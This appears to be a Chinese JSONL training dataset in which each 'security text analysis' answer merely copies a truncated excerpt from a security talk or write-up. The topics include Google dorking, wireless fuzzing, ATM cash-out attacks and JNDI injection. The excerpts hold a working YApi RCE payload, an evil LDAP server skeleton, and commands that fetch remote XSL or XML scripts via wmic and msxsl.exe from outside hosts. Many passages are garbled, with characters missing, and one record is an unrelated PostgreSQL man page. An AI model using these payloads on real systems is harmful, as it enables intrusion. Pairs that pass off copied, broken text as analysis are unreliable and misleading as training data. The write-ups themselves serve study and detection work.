"text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYou found that on Google? Gaining awareness about Google Hackers Johnny Long johnny@ihackstuff.com HUGE DISCLAIMER! The print/CD version of this presentation is much smaller than the live version!  The live version shows many more techniques and examples. After all, I cant leave a paper trail =P  DEFCON ATTENDEES: This print version is the same as the Blackhat talk, but the live version is very different! Im too lazy to make 2 print versions ;-) What this is about  Well be talking about how hackers can use Google to locate vulnerable targets and sensitive information  This process has been termed Google hacking  We will be blowing through the basics  After all, this is DEFCON! =) Advanced Operators  Google advanced operators help refine searches  Advanced operators use a syntax such as the following:  operator:search_term  Notice that there's no space between the operator, the colon, and the search term Advanced Operators  site: restrict a search to a specific web site or domain  The web site to search must be supplied after the colon.  filetype: search only within the text of a particular type of file  link: search within hyperlinks  cache: displays the version of a web page as it appeared when Google crawled the site  intitle: search for a term in the title of a document  inurl: search only within the URL (web address) of a document Search Characters  Some characters:  ( + ) force inclusion of a search term  ( - ) exclude a search term  (  ) use quotes around search phrases  ( . ) a single-character wildcard  ( * ) any word Site Crawling  To find every web page Google has crawled for a specific site, use the site: operator site: microsoft.com Server Crawling  To locate additional servers, subtract common hostnames from the query site: microsoft.com -site:www.microsoft.com Directory Listings  Directory listings can be a source of great information intitle:index.of/admin Directory Listings  Directory listings can provide server version information intitle:index.of a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "如何进行XSS攻击防护？", "input": "", "output": "XSS（跨站脚本攻击）防护措施：1. 输出编码：对所有用户输入进行HTML编码 2. 输入验证：验证和过滤用户输入 3. CSP策略：实施内容安全策略 4. HttpOnly Cookie：防止JavaScript访问Cookie 5. 使用安全的框架和库", "category": "security_knowledge", "source": "manual"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n谛听  无线 Fuzzing 之旅 Kevin2600 翠花的日常 翠花是位在报社工作的女编辑. 她跟很多人一样享受着科技带来的便捷. 智 能手机成为她生活中必不可少的一部分. 每天早晨上班前, 她喜欢打开收音 机了解下当天的天气和交通状况. 上班途中她发现个化妆品打折的海报. 为 了获取更多的信息她用手机读取了海报上的二维码标签. 结束了早上的工作后翠花喜欢到附近的咖啡店里吃午餐. 最主要的原因 是店家提供免费 WIFI 上网. 下班归途中她带上新买的 Bluetooth 耳机, 听 点音乐放松下. 半路上翠花收到了家里的智能电饭锅发来的 SMS 短信, 提 醒她晚饭已经蒸好, 回到家后即可用餐. 无线电波 原理从未改变: 频率 > 调制 > 编码 > 无线协议 攻击方式五花八门: 信号干扰; 重放攻击; 数据伪造; 模糊测试  模糊测试 寻找漏洞的方法. 通过向目标发送畸形数据, 试图使目标崩溃. 意想不到的数据: PDF 文档; 图像文件 or 其它交互形式? 意想不到的效果: Stack Overflow; Underflow; Out Bound Read .. 视频: TEMPEST TEMPEST 简介 电磁波干扰? 任何电子设备都会产生电磁场, 对其它无线电设备造成干扰. 电磁波泄漏隐患? 显示屏电磁信号可别解码并还原, 从而达到远程监控目的. 视频: 二维码注入 同样的攻击方式也可运用到 DHCP-主机名; NFC-NDEF; Bluetooth-Name 二维码注入 二维码拥有 2000+ 的数据存储量, 足以注入完整的恶意代码. 无线 Fuzzing - WIFI Aircrack-NG 1.0 DoS 攻击 AirCrack-NG 1.0  EAPoL 溢出 EAPoL  IEEE802.1X 网络端口认证协议. Aircrack-NG在解析 EAPOL 认证包时默认最 大值为 256 bytes. 且不会超过此范围. 尝试在长度位标识超出 256 bytes, 但实际 payloads 并未超出 (Invalid memory read) or 尝试实际 payloads 超出256 bytes (Heap corruption) WIFI 交互流程 数据结构 SSID Injection 攻击 众多无线路由器 OS 具有site survey功能. 用户可扫描周边无线设备. 但对扫描 到的数据没有进行正确过滤处理 入侵者可利用 airbase-ng 或 mdk3 等工具创建带有恶意代码 SSID 对无线设备进 行 Fuzzing 攻击 SSID Injection 案例 路由器操作系统 DD-WRT 23 SP1-RC4, 23 SP2 and 24 无线入侵者的必备设备 WIFI Pineapple (大菠萝) 2.6 SSID 仅支持 32 bytes, 但可通过多个SSID 组合的方式达到完整恶意代码目的 WIFuzz 攻击 通过 Python 的 Scapy 库生成篡改 WIFI 802.11数据包 涵盖 WIFI 网络中的每一阶段 Assoc; Auth; Deauth; EAPoL .. http://code.google.com/p/wifuzz/ 无线 Fuzzing - 蓝牙 Bluetooth 101 Bluetooth 2.0: 2.4ghz; 79 频道1Mhz 带宽; 早期被广泛运用于耳机等 Bluetooth 4.0 (低功耗): 2.4ghz; 40 频道2Mhz 带宽; IOT 设备的标配之一 暴露年龄 的经典攻击: BlueBug; BlueSnarf; BlueSmack; CarWhisperer  Bluetooth 架构 2.0 L2CAP 攻击 L2CAP 无需配对认证, 仅需目标设备可被识别即可 Ping of Death l2ping > 65535 payload BSS (Bluetooth Stack Smasher) L2CAP Fuzzer 不容易 Debug 和判断攻击包是否抵达攻击目标 视频: 蓝牙 L2cap DoS L2CAP 攻击 - 不同的产品, 相同的芯片 BM2042 模块适用于蓝牙v2.0 以及 HID profile 通过 FCC ID 确认蓝牙芯片类型 BM2042 配对攻击 众多蓝牙设备的默认配对密码是 0000 或 1234 (并且无法改变 蓝牙设备名 Ａ248 造成移动设备重启Windows Mobile 6) 蓝牙设备名 HTML5 - JS XSS Injection 旧壶装新酒 .. 视频: Name - Injection Bluetooth 架构 4.0 Ubertooth: 开源 & 价格适中 & 混杂模", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n我知道的与RMI相关的Everything RMI (Java Remote Method Invocation) 是Java远程法调是种允许个 JVM 上的 object 调另个 JVM 上 object 法的机制RMI 的本质是通过 socket 编程Java 序列化 和反序列化动态代理等实现的 RMI 涉及注册中服务端和客户端注册中服务端客户端三者之间通信都会涉及序列 化传输进制数据有序列化然就会有反序列化 先知图镇楼https://xz.aliyun.com/t/2223 搭建调试环境 1创建远程法接 import java.rmi.Remote; 1 import java.rmi.RemoteException; 2 3 2创建远程法接实现类 3创建注册中启动 RMI 的注册服务 4服务端 public interface IService extends Remote { 4 public String queryName(String no) throws RemoteException; 5 } 6 import java.rmi.RemoteException; 1 import java.rmi.server.UnicastRemoteObject; 2 3 public class ServiceImpl extends UnicastRemoteObject implements IService { 4 5 public ServiceImpl() throws RemoteException { 6 } 7 8 @Override 9 public String queryName(String no) throws RemoteException { 10 //方法的具体实现 11 System.out.println(\"hello \"+ no); 12 return String.valueOf(System.currentTimeMillis()); 13 } 14 } 15 import java.rmi.RemoteException; 1 import java.rmi.registry.LocateRegistry; 2 import java.rmi.registry.Registry; 3 4 public class register { 5 public static void main(String[] args) { 6 Registry registry = null; 7 try { 8 registry = LocateRegistry.createRegistry(1099); 9 } catch (RemoteException e) { 10 e.printStackTrace(); 11 } 12 while (true); 13 } 14 } 15 package rmi; 1 import java.rmi.registry.LocateRegistry; 2 import java.rmi.registry.Registry; 3 import java.rmi.server.UnicastRemoteObject; 4 /** 5 * @auther Skay 6 * @date 2021/4/7 17:09 7 5客户端 RMI通信流程分析 * @description 8 */ 9 public class Server { 10 public static void main(String[] args) { 11 Registry registry = null; 12 try { 13 registry = LocateRegistry.getRegistry(\"127.0.0.1\",1099); 14 ServiceImpl obj = new ServiceImpl(); 15 IService service = (IService) UnicastRemoteObject.exportObject(obj, 0); 16 registry.bind(\"vince\",service); 17 } catch (Exception e) { 18 e.printStackTrace(); 19 } 20 } 21 } 22 23 import java.rmi.NotBoundException; 1 import java.rmi.RemoteException; 2 import java.rmi.registry.LocateRegistry; 3 import java.rmi.registry.Registry; 4 5 pu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFROM CAPTURE TO CASHOUT HACKING NEXT-GEN ATMS Senior Security Consultant/Senior Pentester TWITTER, LinkedIN @westonhecker Rapid7 www.rapid7.com A Little Bit About Myself 2 Senior Security Engineer / Senior Pentester / Security Researcher with 12 years experience in programming and reverse engineering Speaker at Defcon 22, 23 and 24 Las Vegas, HOPE 11, TakedownCON 2016, B-sides Boston, Blackhat 2016, Enterprise Connect 2016, ISC2, SC Congress Toronto Other projects: Attacking 911 centers; malware and ransomware analysis; hacking cars, point of sale systems, hotel key systems, and property management systems. 3 EMV, Carder Systems, and Automating Cashout Attacks on the EMV (Europay, MasterCard, Visa) standard Relay attacks on physical cards A tour of a new method of distributing stolen credit card data when transactions have 1 minute shelf life Attacking next generation ATM security features Look at ATM communication backends to financial institutions Introducing La-Cara: an automated Ca$hout machine (ACM?) Demos representing over 400 hours of research on my own time What is EMV?  Developed in France in the 1980s  Europay, MasterCard, and Visa  It is a small chip on card  Standard managed by EMVCo  Replaces magstripe cards  Liability shift 2015-2017 in USA Your Grampas BINS the past Cashing out on backend ? Confidential and Proprietary 8 Confidential and Proprietary 9 Complete With Spelling Errors !! Acceptable timeframe for delimiting string. 5 Digit Delimitation in Time frame. Transaction Challenge for device 1 Tunnel ID internal connection Info Type Quality PIN PAN Limit Flags Feedback Success Analytics Close Con 5 Digit Delimitation Initial Tunnel Info Your Time Block 60 Second Block 60 Second Block 60 Second Block 60 Second Block 5 Digit Delimitati on in Time frame . Transaction Challenge f or device 1 Tunnel ID internal connection Info Type Quality PIN PAN Limit Flags Feedback Success Analytics Close Con 5 Digit Delimitation Initial Tunnel Info 30 Seconds Receiv", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# YApi开放注册导致RCE [中文版本(Chinese version)](README.zh-cn.md) YApi是一个API管理工具如果注册功能开放攻击者可以使用Mock功能执行任意代码 参考链接 - <https://paper.seebug.org/1639/> - <https://www.freebuf.com/vuls/279967.html> ## 漏洞环境 执行如下命令启动一个YApi 1.9.2 ``` docker compose up -d ``` 环境启动后访问`http://your-ip:3000`即可查看到YApi首页 ## 漏洞复现 首先注册一个用户并创建项目和接口 ![](1.png) ![](2.png) 接口中有一个Mock页面可以填写代码我们填写包含恶意命令的代码 ``` const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionConstructor('return process') const process = myfun() mockJson = process.mainModule.require(\"child_process\").execSync(\"id;uname -a;pwd\").toString() ``` ![](3.png) 然后回到预览页面可以获得Mock的URL ![](4.png) 打开这个URL即可查看到命令执行的结果 ![](5.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1047-win-通过WMIC创建远程进程 ## 来自ATT&CK的描述 Windows管理规范WMI是Windows管理功能它为本地和远程访问Windows系统组件提供了统一的环境它依靠WMI服务进行本地和远程访问并依靠服务器消息块SMB和远程过程调用服务RPCS进行远程访问RPCS通过端口135运行 攻击者可以使用WMI与本地和远程系统进行交互并将其用作执行许多战术功能的手段例如收集信息以进行发现和远程执行文件作为横向移动的一部分 ## 测试案例 攻击者可以使用Windows Management InstrumentationWMI通过远程启动可执行文件来横向移动本案例描述了如何使用网络流量监视和目标主机上的进程监视来检测这些进程但是如果在源主机上使用了命令行实用程序wmic.exe则可以在分析中另外检测到它源主机上的命令行被构建为类似wmic.exe /node:\"\\<hostname\\>\" process call create \"\\<command line\\>\"也可以通过IP地址进行连接在这种情况下字符串\"\\<hostname\\>\"修改为IP地址 ## 检测日志 windows安全日志 ## 测试复现 源主机执行wmic.exe /node:\"\\<hostname\\>\" process ![test](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/QDncB4.png) ## 测试留痕 事件ID进程命令行参数进程名称 ## 检测规则/思路 ```yml title: 通过wmic创建远程进程 description: windows server 2016 status: experimental author: 12306Bro logsource:  product: windows  service: system detection:  selection:  EventID: 4688 #进程创建  Newprocessname: 'C:\\Windows\\System32\\wbem\\WMIC.exe' #新进程名称 Creatorprocessname: 'C:\\Windows\\System32\\cmd.exe' #创建者进程名称 Processcommandline: 'wmic.exe /node:* process *' #进程命令行  condition: selection level: medium ``` ## 参考推荐 MITRE-ATT&CK-T1047 <https://attack.mitre.org/techniques/T1047/> CAR-2016-03-002通过WMIC创建远程进程 <https://car.mitre.org/analytics/CAR-2016-03-002/> wmic命令收集与整理 <https://blog.csdn.net/qq_20307987/article/details/7322203> wmic内网使用 <https://www.cnblogs.com/0xdd/p/11393392.html>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJNDI 注利 Bypass 版本 JDK 限制 0x00 前 JNDI 注利常泛但是在版本 JDK 中由于默认 codebase 为 true 从导致客户端默认不会请求远程Server 上的恶意 Class不过这种法也有 Bypass 的式本主要学习 KINGX 师傅所提出的两种 Bypass 的法 KINGX 师傅章链接https://mp.weixin.qq.com/s/Dq1CPbUDLKH2IN0NA_nBDA JNDI 注通常利 rmi ldap 两种式来进利其中 ldap 所适的 JDK 版本更加多些 RMIJDK 8u113JDK 7u122JDK 6u132 起 codebase 默认为 true LDAPJDK 11.0.1JDK 8u191JDK 7u201JDK 6u211 起 codebase 默认为 true 关于 JNDI 注的章可以看KINGX师傅的 章链接https://mp.weixin.qq.com/s?__biz=MzAxNTg0ODU4OQ==&mid=2650358440&idx=1&sn=e005f72 1beb8584b2c2a19911c8fef67&chksm=83f0274ab487ae5c250ae8747d7a8dc7d60f8c5bdc9ff63d0d930dca63 199f13d4648ffae1d0&scene=21#wechat_redirect 0x01 Bypass 1返回序列化Payload触发本地Gadget 由于在版本 JDK 中 codebase 默认为 true 就导致客户端法请求未受信任的远程Server上的 class所以既然不 能远程那么就尝试来攻击本地 classpath 当我们开启个恶意的 Server 并控制返回的数据由于返回的数据是序列化的所以当客户端接收到数据之后会 进反序列化操作那么如果客户端本地存在有反序列化漏洞的组件那么就可以直接触发 Evil LDAP Server /** * In this case * Server return Serialize Payload, such as CommonsCollections * if Client's ClassPath exists lib which is vulnerability version So We can use it * Code part from marshalsec */ import java.net.InetAddress; import java.net.MalformedURLException; import java.text.ParseException; import javax.net.ServerSocketFactory; import javax.net.SocketFactory; import javax.net.ssl.SSLSocketFactory; import com.unboundid.ldap.listener.InMemoryDirectoryServer; import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; import com.unboundid.ldap.listener.InMemoryListenerConfig; import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; import com.unboundid.ldap.sdk.Entry; import com.unboundid.ldap.sdk.LDAPException; import com.unboundid.ldap.sdk.LDAPResult; import com.unboundid.ldap.sdk.ResultCode; import com.unboundid.util.Base64; public class HackerLdapServer { private static final String LDAP_BASE = \"dc=example,dc=com\"; public static void main ( String[] args ) { int port = 1389; try { InMemoryDirectoryServerConfig config = new ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 内核下载与编译 首先我们需要下载并编译内核 ## 下载内核 我们可以从 `https://www.kernel.org` 下载想要的内核根据 https://www.kernel.org/category/releases.html我们可以知道内核主要有以下几种类别 - Prepatch - Mainline - Stable - Longterm 这里我们选择长期支持版 下面为了方便介绍我们使用 `5.4` 版本内核开发者会一直支持这个版本到 2025 年 12 月份进一步地我们选择 5.4 的最新版本 5.4.982021 年 2 月记录为了加速我们可以选择就近的源来下载内核这里使用清华源https://mirrors.tuna.tsinghua.edu.cn/kernel/ ```bash  curl -O -L https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.4.98.tar.xz % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 104M 100 104M 0 0 35.5M 0 0:00:02 0:00:02 --:--:-- 35.5M  unxz linux-5.4.98.tar.xz ``` ## 验证内核签名 为了防止内核被恶意修改在发布内核时发布者会对内核进行签名这里我们也对内核的签名进行校验 ```bash  curl -O -L https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.4.98.tar.sign % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 989 100 989 0 0 5525 0 --:--:-- --:--:-- --:--:-- 5525  gpg --verify linux-5.4.98.tar.sign gpg: assuming signed data in 'linux-5.4.98.tar' gpg: Signature made 2021年02月13日 星期六 20时54分47秒 CST gpg: using RSA key 647F28654894E3BD457199BE38DBBDC86092693E gpg: Can't check signature: No public key ``` 可以看到我们遇到了 `Can't check signature: No public key` 的问题这主要是因为我们没有相应的公钥来验证签名此时我们可以下载相应内核版本发布者的公钥 ```bash  gpg --locate-keys torvalds@kernel.org gregkh@kernel.org gpg: WARNING: unacceptable HTTP redirect from server was cleaned up gpg: key 38DBBDC86092693E: public key \"Greg Kroah-Hartman <gregkh@kernel.org>\" imported gpg: Total number processed: 1 gpg: imported: 1 gpg: WARNING: unacceptable HTTP redirect from server was cleaned up gpg: key 79BE3E4300411886: public key \"Linus Torvalds <torvalds@kernel.org>\" imported gpg: Total number processed: 1 gpg: imported: 1 pub rsa4096 2011-09-23 [SC] 647F28654894E3BD457199BE38DBBDC86092693E uid [ unknown] Greg Kroah-Hartman <gregkh@kernel.org> sub rsa4096 2011-09-23 [E] pub rsa2048 2011-09-20 [SC] ABAF11C65A2970B130ABE3C479BE3E4300411886 uid [ unknown] Linus Torvalds <torvalds@kernel", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nADVANCED WIRELESS ATTACKS AGAINST ENTERPRISE NETWORKS LAB SETUP GUIDE VERSION 1.0.2 Gabriel Ryan @s0lst1c3 @gdssecurity gryan@gdssecurity.com solstice.me Advanced Wireless Attacks Against Enterprise Networks Introduction  2017 Gabriel Ryan All Rights Reserved 2 INTRODUCTION For this workshop, well be using a lab that consist of five virtual machines joined to the same virtual network. Three of these virtual machines will run Windows and will be joined to one another using Active Directory. One of the three Windows machines will serve as the Domain Controller, and the other two will act as workstations. The remaining two virtual machines include a PFSense instance that will serve as a firewall between our lab and the outside world, and a Kali virtual machine that is preloaded with everything you need for this course. The PFSense and Kali virtual machines are completely preconfigured and require no manual setup on the part of the student. Unfortunately, it was not possible to provide preconfigured Windows virtual machines due to licensing issues. That means youre going to have to download and configure your Active Directory machines yourself. With that said, worry not. Ive gone to great lengths to make the lab setup process as painless as possible by providing a set of PowerShell scripts that will do most of the legwork for you. All you have to do is download the required ISOs and Virtual Machines and use the provided scripts as described in the sections below. Try not to get intimidated by the size of this setup guide. Its basically a giant picture book, with most of the following pages being occupied by screenshots. You should fly through the lab setup process fairly quickly once you have everything downloaded. Regardless, I do recommend completing the lab setup process before getting to the conference. The reason for this is that youre going to have to download a couple of large files, and you probably dont want to be stuck doing this the night before over flaky co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1220-win-XSL Script Processing ## 来自ATT&CK的描述 Extensible Stylesheet Language (XSL)是用来描述和渲染XML文件的为了进行复杂的操作XSL增加了不同的语言红队可以使用它来运行二进制代码绕过白名单的检查和Trusted Developer Utilities相似msxsl.exe可以在本地或者远程运行JavaScript虽然msxsl.exe不是默认安装了但是红队可以打包它并放在客户端msxsl.exe运行时接收两个参数XML源文件和XSL stylesheet既然xsl文件也是一个xml红队可以使用xsl文件两次当msxsl.exe运行的时候红队可以给xml/xsl文件任意的扩展名 命令行的例子如下: - msxsl.exe customers[.]xml script[.]xsl - msxsl.exe script[.]xsl script[.]xsl - msxsl.exe script[.]jpeg script[.]jpeg 另一种技术叫做Squiblytwo它使用windows管理工具调用JScript或VBScript在xsl文件中这个技术也可以执行远程或本地的script和Regsvr32一样Squiblydoo也是一个windows信任的工具 命令行的例子如下: - Local File: wmic process list /FORMAT:evil[.]xsl - Remote File: wmic os get /FORMAT:https[:]//example[.]com/evil[.]xsl ## 测试案例 无 ## 检测日志 Windows安全日志/Sysmon日志 ## 测试复现 ### 测试1 MSXSL BYPASS USING LOCAL FILES 首先需要下载工具msxsl.exe目前尚未找到可下载的地址 ``` C:\\Windows\\Temp\\msxsl.exe msxslxmlfile.xml msxslscript.xsl ``` 尚未复现成功 ### 测试2 ``` msxsl.exe http://snappyzz.com/msxslxmlfile.xml http://snappyzz.com/msxslscript.xsl ``` ## 日志留痕 可参考Windows 安全日志4688事件说明Windows Sysmon安全日志1事件说明 ## 检测规则/思路 ### sigma规则 ```yml title: windows下使用msxsl.exe加载恶意程序 description: msxsl.exe是微软用于命令行下处理XSL的一个程序所以通过该程序我们可以执行JavaScript进而执行系统命令 status: experimental author: 12306Bro logsource:  product: windows  service: security detection:  selection:  EventID: 4688 #Windows 安全日志 Process_name: 'msxsl.exe' #Application Name Commanline: - '*.xsl' - '*.xml' - 'http://*'  condition: selection level: medium ``` ### 建议 使用进程监控来监测msxsl.exe和wmic.exe的执行和参数将这些工具最近的调用与之前已知的良好参数和加载文件的历史进行比较以确定异常和潜在的恶意活动例如URL命令行参数创建外部网络连接加载与脚本相关的DLLs脚本调用前后使用的命令参数也可能有助于确定被加载的有效载荷的来源和目的 在一个不用于这些目的的系统上出现msxsl.exe或其他能够实现代理执行的实用程序通常用于开发调试和逆向工程可能是可疑的 ## 参考推荐 MITRE-ATT&CK-T1220 <https://attack.mitre.org/techniques/T1220> 跟着ATT&CK学安全之defense-evasion <https://snappyjack.github.io/articles/2020-01/%E8%B7%9F%E7%9D%80ATT&CK%E5%AD%A6%E5%AE%89%E5%85%A8%E4%B9%8Bdefense-evasion>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"SET\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME SET \\- 改变运行时参数 .SH SYNOPSIS .sp .nf SET [ SESSION | LOCAL ] \\fIname\\fR { TO | = } { \\fIvalue\\fR | '\\fIvalue\\fR' | DEFAULT } SET [ SESSION | LOCAL ] TIME ZONE { \\fItimezone\\fR | LOCAL | DEFAULT } .sp .fi .SH \"DESCRIPTION 描述\" .PP SET 命令修改运行时配置参数许多在 Section 16.4 ``Run-time Configuration'' 里面列出的运行时参数可以用 SET 在运行时设置 但是有些要求使用超级用户权限来修改而其它有些则在服务器或者会话 开始之后不能修改请注意 SET 只影响当前会话使用的数值 .PP 如果 SET 或者 SET SESSION 是在一个稍后退出的事务里发出的 那么 SET 命令的效果将在事务回滚的之后小时 这个行为和PostgreSQL版本 7.3 之前的不同 那个时候 SET 的效果在后面的错误之后不会回滚 一旦包围它的事务提交那么其效果将持续到事务的结束除非被另外一个 SET 覆盖 .PP SET LOCAL 的效果只持续到当前事务结束不管是否提交 一个特例是在一个事务里面的 SET 后面跟着一个 SET LOCAL在事务结束之前只能看到 SET LOCAL 的数值但是之后如果事务提交则是 SET 的值生效 .SH \"PARAMETERS 选项\" .TP \\fBSESSION\\fR 声明这个命令只对当前会话起作用 如果 SESSION 或 LOCAL 都没出现那么这个是缺省 .TP \\fBLOCAL\\fR 声明该命令只在当前事务中有效在 COMMIT 或者 ROLLBACK 之后会话级别的设置将再次生效 请注意如果在 BEGIN 块之外运行那么 SET LOCAL 将表现出没有作用因为事务将立即结束 .TP \\fB\\fIname\\fB\\fR 可设置的运行时参数的名字可用的参数在 Section 16.4 ``Run-time Configuration'' 和下面归档 .TP \\fB\\fIvalue\\fB\\fR 参数的新值值可以声明为字串常量标识符数字或者逗号分隔的上面这些东西的列表 DEFAULT 可以用于把这些参数设置为它们的缺省值 .PP 除了在 Section 16.4 ``Run-time Configuration'' 里面有文档记载的配置参数之外 还有几个只能用 SET 命令设置或者是有特殊的语法的参数 .TP \\fBNAMES\\fR SET NAMES \\fIvalue\\fR 是 SET client_encoding TO \\fIvalue\\fR 的别名 .TP \\fBSEED\\fR 为随机数生成器函数 random设置内部的种子 允许的值是介于 0 和 1 之间的浮点数然后它会被乘以 231-1 我们也可以通过调用函数 setseed 来设置种子 .sp .nf SELECT setseed(\\fIvalue\\fR); .sp .fi .TP \\fBTIME ZONE\\fR SET TIME ZONE \\fIvalue\\fR 是 for SET timezone TO \\fIvalue\\fR 的一个别名 语法 SET TIME ZONE 允许为时区设置特殊的语法 下面是有效值的例子 .RS .TP \\fB\\&'PST8PDT'\\fR 加州伯克利的时区 .TP \\fB\\&'Portugal'\\fR 葡萄牙时区 .TP \\fB\\&'Europe/Rome'\\fR 意大利时区 .TP \\fB-7\\fR UTC 以西 7 小时的时区等效于 PDT .TP \\fBINTERVAL '-08:00' HOUR TO MINUTE\\fR UTC 以西 8 小时的时区等效于 PST .TP \\fBLOCAL\\fR .TP \\fBDEFAULT\\fR 将时区设置为你的本地时区服务器的操作系统缺省的那个 .RE .PP 参阅 Section 8.5 ``Date/Time Types'' 获取有关时区的更多细节 .PP .PP .SH \"NOTES 注意\" .PP 函数 set_config 提供了等效的功能 参阅 Section 9.13 ``Miscellaneous Functions''  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nXprobe Remote ICMP Based OS Fingerprinting Techniques Ofir Arkin Managing Security Architect  2 0 0 1 @ S T A K E , I N C . 2 Agenda  What is Xprobe?  Xprobe 101  Examples  The Static Engine  The Signature Based Engine  More Examples  Known Problems, Detecting Xprobes Activity, To Do List  Questions  2 0 0 1 @ S T A K E , I N C . 3 Xprobe Creators  2 0 0 1 @ S T A K E , I N C . 4 What is Xprobe? Written and maintained by Fyodor Yarochkin and Ofir Arkin, Xprobe is an Active OS fingerprinting tool based on Ofir Arkins ICMP Usage In Scanning Research project (http://www.sys-security.com). Xprobe is an alternative to some tools which are heavily dependent upon the usage of the TCP protocol for remote active operating system fingerprinting. This is especially true when trying to identify some Microsoft based operating systems, when TCP is the protocol being used with the fingerprinting process. Since the TCP implementation with Microsoft Windows XP & Microsoft Windows 2000 and Microsoft Windows ME, and with Microsoft Windows NT 4 and Microsoft Windows 98/98SE are so close, usually when using the TCP protocol with a remote active operating systems fingerprinting process we are unable to differentiate between these Microsoft based operating system groups. And this is only an example.  2 0 0 1 @ S T A K E , I N C . 5 What is Xprobe? As we will demonstrate the number of datagrams we need to send and receive in order to remotely fingerprint a targeted machine with Xprobe is small. Very small. In fact we can send one datagram and receive one reply and this will help us identify up to eight different operating systems (or groups of operating systems). The maximum amount of packets used to successfully identify an operating system is maximum of 4 sent, and maximum of 4 received. This makes Xprobe very fast as well.  2 0 0 1 @ S T A K E , I N C . 6 What is Xprobe? Xprobe probes can be very stealthy. Xprobe does not send any malformed datagrams to detect a remote OS type, unlike t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nqingxp9 whoami 杨芸菲 @qingxp9 360 PegasusTeam 无线安全研究员 WLAN安全研究WIPS等无线安全产品研发 C-SEC 如今我们面临的无线威胁 CCF YOCSEF沈阳公共无线安全的现状与未来 绵羊墙公共WiFi风险演示系统 东北大学无线安全课程客座讲师 Outline ① 无人机安全威胁背景 ② 基于802.11的反无人机方案 ③ 低成本反无人机系统的设计与实现 ④ 承载在802.11上的无人机管控方案 无人机安全威胁 近年来无人机应用范围越来越广泛航拍快递灾后搜救数据采集无人 机数量迅速增加随之也产生了一系列安全管控问题 未经许可闯入敏感区域意外坠落 影响客机正常起降碰撞高层建筑等 事件不断发生 向各国政府提出了新的监管命题 无人机安全威胁 个人隐私 无人机安全威胁 军事安全 ISIS改装无人机用于投放炸弹 无人机安全威胁 民航安全 成都双流机场无人机事件: 从4月14日至4月27日双流机场接连发生8 件无人机扰航事件总计造成114个航班备 降超过40个航班延误4架飞机返航超1 万旅客出行受阻被滞留机场严重威胁民航 飞行安全 英国反无人飞行器防御系统(AUDS) 核心技术 1.Ku波段12GHz到18GHz电子扫描防空雷达技术 a. 支持检测距离10KM b. 支持检测0.01平方米大小设备 c. 结合多普勒检测 2.高精度水平和倾斜方位指示器 a. 动态方位定位器热感摄像机进行目标识别 b. 视频追踪 3.智能定向射频抑制干扰系统 a. 高增益四频五天线 b. 自定义抑制波形支持GNSS频率 c. 软件定义智能射频抑制 可实现15秒内探测跟踪和干扰无人机 AUDS system combines electronic-scanning radar target detection, electro- optical (EO) tracking/classification and directional RF inhibition capability. 三家公司各自的系统分别在雷达探测 影像/视频跟踪和射频干扰/数据通信方 面达到了行业最佳水平  红外线  视图  音频  雷达  Wi-Fi  RF   DroneTracker identification and counter-measures platform to defeat drone http://www.dedrone.com/en/dronetracker/drone-protection-software DroneTracker 捕获方案 检测与干扰 总结 无线电干扰攻击面 不建议使用GPS欺骗技术打击无人机 无线电干扰缺点  会影响其他无线电信号的正常通信 无人机普遍采用跳频扩频技术具有一定的抗干扰能力容易出现 干死一大片无人机照样飞的窘境  无线电信号干扰设备存在法律风险 中华人民共和国刑法修正案九第288条 违反国家规定擅自设置使用无线电台站或者擅自使用无线电频率 干扰无线电通讯秩序情节严重的处三年以下有期徒刑拘役或者管制并 处或者单处罚金情节特别严重的处三年以上七年以下有期徒刑并处罚 金 基于802.11的反无人机方案 拓扑 消费级无人机设备基本都使用了 Wi-Fi在飞行器和手机间传输遥控 图传等信号 Wi-Fi 特征 802.11 Beacon Frame Wi-Fi 特征 802.11 Probe Response Frame 无人机型号 OUI SSID Drone Model 60:60:1f PHANTOM3_xxxxx x PHANTOM3 60:60:1f Mavic-xxxxxx MAVIC e4:12:18 XPLORER_xxxxxx XPLORER KONGYING-xxxxxx KONGYING MiRC-xxxxxx XiaoMi OUISSID及型号对应关系 操控者识别 用于图像显示的操控者手机终端 干扰无人机 Deauthentication Attack 类型 热点位置 中断图像 Dji PHANTOM3 遥控器 Yes Dji 